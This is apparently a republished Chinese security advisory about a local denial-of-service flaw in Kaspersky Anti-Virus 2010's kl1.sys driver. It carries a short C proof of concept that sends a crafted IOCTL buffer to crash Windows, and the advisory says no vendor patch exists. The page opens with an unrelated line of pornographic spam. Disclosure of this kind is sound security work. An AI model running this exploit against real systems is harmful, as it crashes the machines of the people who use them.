自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Kaspersky Anti-Virus kl1.sys驅動本地拒絕服務漏洞

作者:佚名
安全 漏洞
拒絕服務##遠程攻擊##立即處理[msg]影響版本: Kaspersky Labs Kaspersky Antivirus 2010 9.0.0.463漏洞描述: BUGTRAQ ID: 37044 Kaspersky Antivirus是非常流行的殺毒軟件。 Kaspersky殺毒軟件所使用的kl1.sys驅動沒有檢查IOCTL的輸入地址,如果用戶修改了一個或兩個DWORD就可以觸發(fā)異常,導致系統(tǒng)藍屏死機。

影響版本: Kaspersky Labs Kaspersky Antivirus 2010 9.0.0.463

漏洞描述: BUGTRAQ  ID: 37044

Kaspersky Antivirus是非常流行的殺毒軟件。

Kaspersky殺毒軟件所使用的kl1.sys驅動沒有檢查IOCTL的輸入地址,如果用戶修改了一個或兩個DWORD就可以觸發(fā)異常,導致系統(tǒng)藍屏死機。

<*參考  Heurs (heurs@ghostsinthstack.org) *>
測試方法:

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!

#include

#include

#include

#include

#include 

int __cdecl main(int argc, char* argv[]) 
{ 
    HANDLE hDevice = (HANDLE) 0xffffffff; 
    DWORD NombreByte; 
    DWORD Crashing[] = { 
         0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a, 
         0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961, 
         0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9, 
         0xb5ebadc5 
        }; 
    BYTE Out[0x20]; 
     
    printf("Local DoS - Kaspersky 2010 9.0.0.463\n\n"); 
    hDevice = CreateFile("\\\\.\\kimul25",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL); 
     
    DeviceIoControl(hDevice,0x0022c008,Crashing,sizeof(Crashing),Out,sizeof(Out),&NombreByte,NULL); 
     
    printf("Sploit Send.\nhDevice = %x\n", hDevice); 
    CloseHandle(hDevice); 
    getch(); 
    return 0; 
}

SEBUG安全建議:

廠商補?。?

Kaspersky Labs

目前廠商還沒有提供補丁或者升級程序,我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本:

http://www.kaspersky.com/

【編輯推薦】

  1. Cisco IOS MSFC2 畸形二層幀遠程拒絕服務安全缺陷
  2. Sun OpenSolaris內核Panic遠程拒絕服務漏洞
  3. 谷歌發(fā)布Android安全漏洞補丁修復兩個DoS漏洞
責任編輯:安泉 來源: 安全中國
漏洞補丁
相關推薦

2009-10-27 14:17:49

2011-03-03 11:26:09

2009-10-22 11:28:38

2009-10-24 10:29:56

2011-12-29 09:21:09

TomcatHashtable

2009-10-23 13:13:37

2009-10-29 13:24:41

2013-05-17 10:43:32

2010-07-16 15:01:53

2009-10-25 12:40:29

2009-10-21 14:31:15

漏洞補丁

2017-02-16 14:22:24

2009-10-22 11:36:55

漏洞補丁

2010-10-09 14:59:30

2010-01-12 11:58:14

Cisco防火墻拒絕服務漏洞

2009-02-03 09:06:26

2009-10-28 10:36:38

2010-10-08 12:21:22

2009-07-01 09:22:33

2010-09-14 16:54:16

點贊
收藏

51CTO技術棧公眾號